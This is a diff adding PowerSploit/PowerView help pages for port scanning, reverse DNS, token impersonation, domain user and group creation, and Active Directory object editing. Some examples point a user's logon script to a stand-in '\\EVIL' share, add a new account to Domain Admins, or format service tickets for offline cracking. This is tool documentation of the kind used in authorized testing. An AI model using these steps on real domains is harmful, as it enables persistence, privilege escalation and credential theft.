+### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -OutputFormat +Either 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format. +Defaults to 'John'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Format + +Required: False +Position: Named +Default value: John +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.SPNTicket + +Outputs a custom object containing the SamAccountName, ServicePrincipalName, and encrypted ticket section. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Invoke-Portscan.md b/docs/Recon/Invoke-Portscan.md new file mode 100755 index 0000000..49d9e32 --- /dev/null +++ b/docs/Recon/Invoke-Portscan.md @@ -0,0 +1,430 @@ +# Invoke-Portscan + +## SYNOPSIS +Simple portscan module + +PowerSploit Function: Invoke-Portscan +Author: Rich Lundeen (http://webstersProdigy.net) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +### cmdHosts +``` +Invoke-Portscan -Hosts [-ExcludeHosts ] [-Ports ] [-PortFile ] + [-TopPorts ] [-ExcludedPorts ] [-SkipDiscovery] [-PingOnly] [-DiscoveryPorts ] + [-Threads ] [-nHosts ] [-Timeout ] [-SleepTimer ] [-SyncFreq ] [-T ] + [-GrepOut ] [-XmlOut ] [-ReadableOut ] [-AllformatsOut ] [-noProgressMeter] + [-quiet] [-ForceOverwrite] +``` + +### fHosts +``` +Invoke-Portscan -HostFile [-ExcludeHosts ] [-Ports ] [-PortFile ] + [-TopPorts ] [-ExcludedPorts ] [-SkipDiscovery] [-PingOnly] [-DiscoveryPorts ] + [-Threads ] [-nHosts ] [-Timeout ] [-SleepTimer ] [-SyncFreq ] [-T ] + [-GrepOut ] [-XmlOut ] [-ReadableOut ] [-AllformatsOut ] [-noProgressMeter] + [-quiet] [-ForceOverwrite] +``` + +## DESCRIPTION +Does a simple port scan using regular sockets, based (pretty) loosely on nmap + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Invoke-Portscan -Hosts "webstersprodigy.net,google.com,microsoft.com" -TopPorts 50 +``` + +Description +----------- +Scans the top 50 ports for hosts found for webstersprodigy.net,google.com, and microsoft.com + +### -------------------------- EXAMPLE 2 -------------------------- +``` +echo webstersprodigy.net | Invoke-Portscan -oG test.gnmap -f -ports "80,443,8080" +``` + +Description +----------- +Does a portscan of "webstersprodigy.net", and writes a greppable output file + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Invoke-Portscan -Hosts 192.168.1.1/24 -T 4 -TopPorts 25 -oA localnet +``` + +Description +----------- +Scans the top 20 ports for hosts found in the 192.168.1.1/24 range, outputs all file formats + +## PARAMETERS + +### -Hosts +Include these comma seperated hosts (supports IPv4 CIDR notation) or pipe them in + +```yaml +Type: String[] +Parameter Sets: cmdHosts +Aliases: + +Required: True +Position: Named +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +### -HostFile +Input hosts from file rather than commandline + +```yaml +Type: String +Parameter Sets: fHosts +Aliases: iL + +Required: True +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ExcludeHosts +Exclude these comma seperated hosts + +```yaml +Type: String +Parameter Sets: (All) +Aliases: exclude + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Ports +Include these comma seperated ports (can also be a range like 80-90) + +```yaml +Type: String +Parameter Sets: (All) +Aliases: p + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -PortFile +Input ports from a file + +```yaml +Type: String +Parameter Sets: (All) +Aliases: iP + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -TopPorts +Include the x top ports - only goes to 1000, default is top 50 + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ExcludedPorts +Exclude these comma seperated ports + +```yaml +Type: String +Parameter Sets: (All) +Aliases: xPorts + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SkipDiscovery +Treat all hosts as online, skip host discovery + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: Pn + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -PingOnly +Ping scan only (disable port scan) + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: sn + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -DiscoveryPorts +Comma separated ports used for host discovery. +-1 is a ping + +```yaml +Type: String +Parameter Sets: (All) +Aliases: PS + +Required: False +Position: Named +Default value: -1,445,80,443 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Threads +number of max threads for the thread pool (per host) + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 100 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -nHosts +number of hosts to concurrently scan + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 25 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Timeout +Timeout time on a connection in miliseconds before port is declared filtered + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 2000 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SleepTimer +Wait before thread checking, in miliseconds + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 500 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SyncFreq +How often (in terms of hosts) to sync threads and flush output + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 1024 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -T +\[0-5\] shortcut performance options. +Default is 3. +higher is more aggressive. +Sets (nhosts, threads,timeout) + 5 {$nHosts=30; $Threads = 1000; $Timeout = 750 } + 4 {$nHosts=25; $Threads = 1000; $Timeout = 1200 } + 3 {$nHosts=20; $Threads = 100; $Timeout = 2500 } + 2 {$nHosts=15; $Threads = 32; $Timeout = 3000 } + 1 {$nHosts=10; $Threads = 32; $Timeout = 5000 } + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -GrepOut +Greppable output file + +```yaml +Type: String +Parameter Sets: (All) +Aliases: oG + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -XmlOut +output XML file + +```yaml +Type: String +Parameter Sets: (All) +Aliases: oX + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ReadableOut +output file in 'readable' format + +```yaml +Type: String +Parameter Sets: (All) +Aliases: oN + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -AllformatsOut +output in readable (.nmap), xml (.xml), and greppable (.gnmap) formats + +```yaml +Type: String +Parameter Sets: (All) +Aliases: oA + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -noProgressMeter +Suppresses the progress meter + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -quiet +supresses returned output and don't store hosts in memory - useful for very large scans + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: q + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ForceOverwrite +Force Overwrite if output Files exist. +Otherwise it throws exception + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: F + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + +[http://webstersprodigy.net](http://webstersprodigy.net) + diff --git a/docs/Recon/Invoke-ReverseDnsLookup.md b/docs/Recon/Invoke-ReverseDnsLookup.md new file mode 100755 index 0000000..348ad91 --- /dev/null +++ b/docs/Recon/Invoke-ReverseDnsLookup.md @@ -0,0 +1,106 @@ +# Invoke-ReverseDnsLookup + +## SYNOPSIS +Perform a reverse DNS lookup scan on a range of IP addresses. + +PowerSploit Function: Invoke-ReverseDnsLookup +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +``` +Invoke-ReverseDnsLookup [-IpRange] +``` + +## DESCRIPTION +Invoke-ReverseDnsLookup scans an IP address range for DNS PTR records. +This script is useful for performing DNS reconnaisance prior to conducting an authorized penetration test. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Invoke-ReverseDnsLookup 74.125.228.0/29 +``` + +IP HostName +-- -------- +74.125.228.1 iad23s05-in-f1.1e100.net +74.125.228.2 iad23s05-in-f2.1e100.net +74.125.228.3 iad23s05-in-f3.1e100.net +74.125.228.4 iad23s05-in-f4.1e100.net +74.125.228.5 iad23s05-in-f5.1e100.net +74.125.228.6 iad23s05-in-f6.1e100.net + +Description +----------- +Returns the hostnames of the IP addresses specified by the CIDR range. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Invoke-ReverseDnsLookup '74.125.228.1,74.125.228.4-74.125.228.6' +``` + +IP HostName +-- -------- +74.125.228.1 iad23s05-in-f1.1e100.net +74.125.228.4 iad23s05-in-f4.1e100.net +74.125.228.5 iad23s05-in-f5.1e100.net +74.125.228.6 iad23s05-in-f6.1e100.net + +Description +----------- +Returns the hostnames of the IP addresses specified by the IP range specified. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Write-Output "74.125.228.1,74.125.228.0/29" | Invoke-ReverseDnsLookup +``` + +IP HostName +-- -------- +74.125.228.1 iad23s05-in-f1.1e100.net +74.125.228.1 iad23s05-in-f1.1e100.net +74.125.228.2 iad23s05-in-f2.1e100.net +74.125.228.3 iad23s05-in-f3.1e100.net +74.125.228.4 iad23s05-in-f4.1e100.net +74.125.228.5 iad23s05-in-f5.1e100.net +74.125.228.6 iad23s05-in-f6.1e100.net + +Description +----------- +Returns the hostnames of the IP addresses piped from another source. + +## PARAMETERS + +### -IpRange +Specifies the IP address range. +The range provided can be in the form of a single IP address, a low-high range, or a CIDR range. +Comma-delimited ranges may can be provided. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + +[http://www.exploit-monday.com +https://github.com/mattifestation/PowerSploit]() + diff --git a/docs/Recon/Invoke-RevertToSelf.md b/docs/Recon/Invoke-RevertToSelf.md new file mode 100755 index 0000000..4e978ac --- /dev/null +++ b/docs/Recon/Invoke-RevertToSelf.md @@ -0,0 +1,56 @@ +# Invoke-RevertToSelf + +## SYNOPSIS +Reverts any token impersonation. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect + +## SYNTAX + +``` +Invoke-RevertToSelf [[-TokenHandle] ] +``` + +## DESCRIPTION +This function uses RevertToSelf() to revert any impersonated tokens. +If -TokenHandle is passed (the token handle returned by Invoke-UserImpersonation), +CloseHandle() is used to close the opened handle. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +$Token = Invoke-UserImpersonation -Credential $Cred +Invoke-RevertToSelf -TokenHandle $Token + +## PARAMETERS + +### -TokenHandle +An optional IntPtr TokenHandle returned by Invoke-UserImpersonation. + +```yaml +Type: IntPtr +Parameter Sets: (All) +Aliases: + +Required: False +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Invoke-UserImpersonation.md b/docs/Recon/Invoke-UserImpersonation.md new file mode 100755 index 0000000..6b1afc4 --- /dev/null +++ b/docs/Recon/Invoke-UserImpersonation.md @@ -0,0 +1,100 @@ +# Invoke-UserImpersonation + +## SYNOPSIS +Creates a new "runas /netonly" type logon and impersonates the token. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect + +## SYNTAX + +### Credential (Default) +``` +Invoke-UserImpersonation -Credential [-Quiet] +``` + +### TokenHandle +``` +Invoke-UserImpersonation -TokenHandle [-Quiet] +``` + +## DESCRIPTION +This function uses LogonUser() with the LOGON32_LOGON_NEW_CREDENTIALS LogonType +to simulate "runas /netonly". +The resulting token is then impersonated with +ImpersonateLoggedOnUser() and the token handle is returned for later usage +with Invoke-RevertToSelf. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Invoke-UserImpersonation -Credential $Cred + +## PARAMETERS + +### -Credential +A \[Management.Automation.PSCredential\] object with alternate credentials +to impersonate in the current thread space. + +```yaml +Type: PSCredential +Parameter Sets: Credential +Aliases: + +Required: True +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -TokenHandle +An IntPtr TokenHandle returned by a previous Invoke-UserImpersonation. +If this is supplied, LogonUser() is skipped and only ImpersonateLoggedOnUser() +is executed. + +```yaml +Type: IntPtr +Parameter Sets: TokenHandle +Aliases: + +Required: True +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Quiet +Suppress any warnings about STA vs MTA. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### IntPtr + +The TokenHandle result from LogonUser. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/New-DomainGroup.md b/docs/Recon/New-DomainGroup.md new file mode 100755 index 0000000..fc5cac0 --- /dev/null +++ b/docs/Recon/New-DomainGroup.md @@ -0,0 +1,150 @@ +# New-DomainGroup + +## SYNOPSIS +Creates a new domain group (assuming appropriate permissions) and returns the group object. + +TODO: implement all properties that New-ADGroup implements (https://technet.microsoft.com/en-us/library/ee617253.aspx). + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-PrincipalContext + +## SYNTAX + +``` +New-DomainGroup [-SamAccountName] [[-Name] ] [[-DisplayName] ] + [[-Description] ] [[-Domain] ] [[-Credential] ] +``` + +## DESCRIPTION +First binds to the specified domain context using Get-PrincipalContext. +The bound domain context is then used to create a new +DirectoryServices.AccountManagement.GroupPrincipal with the specified +group properties. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +New-DomainGroup -SamAccountName TestGroup -Description 'This is a test group.' +``` + +Creates the 'TestGroup' group with the specified description. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +New-DomainGroup -SamAccountName TestGroup -Description 'This is a test group.' -Credential $Cred + +Creates the 'TestGroup' group with the specified description using the specified alternate credentials. + +## PARAMETERS + +### -SamAccountName +Specifies the Security Account Manager (SAM) account name of the group to create. +Maximum of 256 characters. +Mandatory. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Name +Specifies the name of the group to create. +If not provided, defaults to SamAccountName. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -DisplayName +Specifies the display name of the group to create. +If not provided, defaults to SamAccountName. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 3 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Description +Specifies the description of the group to create. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 4 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use to search for user/group principals, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 5 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: 6 +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### DirectoryServices.AccountManagement.GroupPrincipal + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/New-DomainUser.md b/docs/Recon/New-DomainUser.md new file mode 100755 index 0000000..80f4fcf --- /dev/null +++ b/docs/Recon/New-DomainUser.md @@ -0,0 +1,184 @@ +# New-DomainUser + +## SYNOPSIS +Creates a new domain user (assuming appropriate permissions) and returns the user object. + +TODO: implement all properties that New-ADUser implements (https://technet.microsoft.com/en-us/library/ee617253.aspx). + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-PrincipalContext + +## SYNTAX + +``` +New-DomainUser [-SamAccountName] [-AccountPassword] [[-Name] ] + [[-DisplayName] ] [[-Description] ] [[-Domain] ] [[-Credential] ] +``` + +## DESCRIPTION +First binds to the specified domain context using Get-PrincipalContext. +The bound domain context is then used to create a new +DirectoryServices.AccountManagement.UserPrincipal with the specified user properties. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +New-DomainUser -SamAccountName harmj0y2 -Description 'This is harmj0y' -AccountPassword $UserPassword + +Creates the 'harmj0y2' user with the specified description and password. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$user = New-DomainUser -SamAccountName harmj0y2 -Description 'This is harmj0y' -AccountPassword $UserPassword -Credential $Cred + +Creates the 'harmj0y2' user with the specified description and password, using the specified +alternate credentials. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +New-DomainUser -SamAccountName andy -AccountPassword $UserPassword -Credential $Cred | Add-DomainGroupMember 'Domain Admins' -Credential $Cred + +Creates the 'andy' user with the specified description and password, using the specified +alternate credentials, and adds the user to 'domain admins' using Add-DomainGroupMember +and the alternate credentials. + +## PARAMETERS + +### -SamAccountName +Specifies the Security Account Manager (SAM) account name of the user to create. +Maximum of 256 characters. +Mandatory. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -AccountPassword +Specifies the password for the created user. +Mandatory. + +```yaml +Type: SecureString +Parameter Sets: (All) +Aliases: Password + +Required: True +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Name +Specifies the name of the user to create. +If not provided, defaults to SamAccountName. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 3 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -DisplayName +Specifies the display name of the user to create. +If not provided, defaults to SamAccountName. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 4 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Description +Specifies the description of the user to create. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 5 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use to search for user/group principals, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 6 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: 7 +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### DirectoryServices.AccountManagement.UserPrincipal + +## NOTES + +## RELATED LINKS + +[http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/](http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/) + diff --git a/docs/Recon/Remove-RemoteConnection.md b/docs/Recon/Remove-RemoteConnection.md new file mode 100755 index 0000000..fe6f3b3 --- /dev/null +++ b/docs/Recon/Remove-RemoteConnection.md @@ -0,0 +1,84 @@ +# Remove-RemoteConnection + +## SYNOPSIS +Destroys a connection created by New-RemoteConnection. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect + +## SYNTAX + +### ComputerName (Default) +``` +Remove-RemoteConnection [-ComputerName] +``` + +### Path +``` +Remove-RemoteConnection [-Path] +``` + +## DESCRIPTION +This function uses WNetCancelConnection2 to destroy a connection created by +New-RemoteConnection. +If a -Path isn't specified, a -ComputerName is required to +'unmount' \\\\$ComputerName\IPC$. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Remove-RemoteConnection -ComputerName 'PRIMARY.testlab.local' +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Remove-RemoteConnection -Path '\\PRIMARY.testlab.local\C$\' +``` + +### -------------------------- EXAMPLE 3 -------------------------- +``` +@('PRIMARY.testlab.local','SECONDARY.testlab.local') | Remove-RemoteConnection +``` + +## PARAMETERS + +### -ComputerName +Specifies the system to remove a \\\\ComputerName\IPC$ connection for. + +```yaml +Type: String[] +Parameter Sets: ComputerName +Aliases: HostName, dnshostname, name + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Path +Specifies the remote \\\\UNC\path to remove the connection for. + +```yaml +Type: String[] +Parameter Sets: Path +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Resolve-IPAddress.md b/docs/Recon/Resolve-IPAddress.md new file mode 100755 index 0000000..744c764 --- /dev/null +++ b/docs/Recon/Resolve-IPAddress.md @@ -0,0 +1,66 @@ +# Resolve-IPAddress + +## SYNOPSIS +Resolves a given hostename to its associated IPv4 address. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Resolve-IPAddress [[-ComputerName] ] +``` + +## DESCRIPTION +Resolves a given hostename to its associated IPv4 address using +\[Net.Dns\]::GetHostEntry(). +If no hostname is provided, the default +is the IP address of the localhost. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Resolve-IPAddress -ComputerName SERVER +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +@("SERVER1", "SERVER2") | Resolve-IPAddress +``` + +## PARAMETERS + +### -ComputerName +{{Fill ComputerName Description}} + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: $Env:COMPUTERNAME +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +## INPUTS + +### String + +Accepts one or more IP address strings on the pipeline. + +## OUTPUTS + +### System.Management.Automation.PSCustomObject + +A custom PSObject with the ComputerName and IPAddress. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Set-DomainObject.md b/docs/Recon/Set-DomainObject.md new file mode 100755 index 0000000..482d86d --- /dev/null +++ b/docs/Recon/Set-DomainObject.md @@ -0,0 +1,346 @@ +# Set-DomainObject + +## SYNOPSIS +Modifies a gven property for a specified active directory object. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainObject + +## SYNTAX + +``` +Set-DomainObject [[-Identity] ] [-Set ] [-XOR ] [-Clear ] + [-Domain ] [-LDAPFilter ] [-SearchBase ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-SecurityMasks ] [-Tombstone] + [-Credential ] +``` + +## DESCRIPTION +Splats user/object targeting parameters to Get-DomainObject, returning the raw +searchresult object. +Retrieves the raw directoryentry for the object, and sets +any values from -Set @{}, XORs any values from -XOR @{}, and clears any values +from -Clear @(). + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose +``` + +VERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser))) +VERBOSE: Setting mstsinitialprogram to \\\\EVIL\program.exe for object testuser + +### -------------------------- EXAMPLE 2 -------------------------- +``` +"S-1-5-21-890171859-3433809279-3366196753-1108","testuser" | Set-DomainObject -Set @{'countrycode'=1234; 'mstsinitialprogram'='\\EVIL\program2.exe'} -Verbose +``` + +VERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: Get-DomainObject filter string: +(&(|(objectsid=S-1-5-21-890171859-3433809279-3366196753-1108))) +VERBOSE: Setting mstsinitialprogram to \\\\EVIL\program2.exe for object harmj0y +VERBOSE: Setting countrycode to 1234 for object harmj0y +VERBOSE: Get-DomainSearcher search string: +LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser))) +VERBOSE: Setting mstsinitialprogram to \\\\EVIL\program2.exe for object testuser +VERBOSE: Setting countrycode to 1234 for object testuser + +### -------------------------- EXAMPLE 3 -------------------------- +``` +"S-1-5-21-890171859-3433809279-3366196753-1108","testuser" | Set-DomainObject -Clear department -Verbose +``` + +Cleares the 'department' field for both object identities. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Get-DomainUser testuser | ConvertFrom-UACValue -Verbose +``` + +Name Value +---- ----- +NORMAL_ACCOUNT 512 + + +Set-DomainObject -Identity testuser -XOR @{useraccountcontrol=65536} -Verbose + +VERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser))) +VERBOSE: XORing 'useraccountcontrol' with '65536' for object 'testuser' + +Get-DomainUser testuser | ConvertFrom-UACValue -Verbose + +Name Value +---- ----- +NORMAL_ACCOUNT 512 +DONT_EXPIRE_PASSWORD 65536 + +### -------------------------- EXAMPLE 5 -------------------------- +``` +Get-DomainUser -Identity testuser -Properties scriptpath +``` + +scriptpath +---------- +\\\\primary\sysvol\blah.ps1 + +$SecPassword = ConvertTo-SecureString 'Password123!'-AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Set-DomainObject -Identity testuser -Set @{'scriptpath'='\\\\EVIL\program2.exe'} -Credential $Cred -Verbose +VERBOSE: \[Get-Domain\] Using alternate credentials for Get-Domain +VERBOSE: \[Get-Domain\] Extracted domain 'TESTLAB' from -Credential +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: \[Get-DomainSearcher\] Using alternate credentials for LDAP connection +VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(|(samAccountName=testuser)(name=testuser)))) +VERBOSE: \[Set-DomainObject\] Setting 'scriptpath' to '\\\\EVIL\program2.exe' for object 'testuser' + +Get-DomainUser -Identity testuser -Properties scriptpath + +scriptpath +---------- +\\\\EVIL\program2.exe + +## PARAMETERS + +### -Identity +A SamAccountName (e.g. +harmj0y), DistinguishedName (e.g. +CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d201). +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DistinguishedName, SamAccountName, Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Set +Specifies values for one or more object properties (in the form of a hashtable) that will replace the current values. + +```yaml +Type: Hashtable +Parameter Sets: (All) +Aliases: Reaplce + +Required: False +Position: Named +Default value: None +Accept pipeline input: False 